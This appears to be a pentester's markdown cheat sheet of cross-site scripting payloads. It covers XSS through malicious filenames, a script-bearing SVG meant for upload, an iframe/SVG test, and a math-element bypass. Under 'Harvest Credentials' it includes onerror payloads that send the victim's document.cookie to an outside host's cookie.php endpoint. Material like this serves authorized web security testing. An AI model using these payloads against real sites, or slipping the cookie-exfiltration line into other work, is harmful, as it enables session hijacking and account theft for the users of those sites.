Skip to content

Latest commit

 

History

History
67 lines (50 loc) · 1.56 KB

File metadata and controls

67 lines (50 loc) · 1.56 KB

XSS Payloads

Filename

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
<a href="javascript:alert(1)">XSS</a

SVG

Copy and paste the following payload into a .SVG file and attempt to upload it to the application.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS via SVG");
  </script>
</svg>

Copy and paste the following payload into a text editor and see if the image is loaded, if so attempt to follow up with a payload:

<iframe
  src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg"
  frameborder="0"
></iframe>
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.domain)</script>
</svg>

Bypasses

Math element which can make HTML element clickable:

<math>
    <xss href="javascript:alert(1337)">
       Click Me
    </xss>
</math>

Harvest Credentials

<img/src/onerror=document.location="https://parzival.sh">
<img/src/onerror=document.location="http://parzival.sh/cookie.php?c="+document.cookie>

Resources

{% embed url="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" %}

{% embed url="https://github.com/cure53/H5SC" %}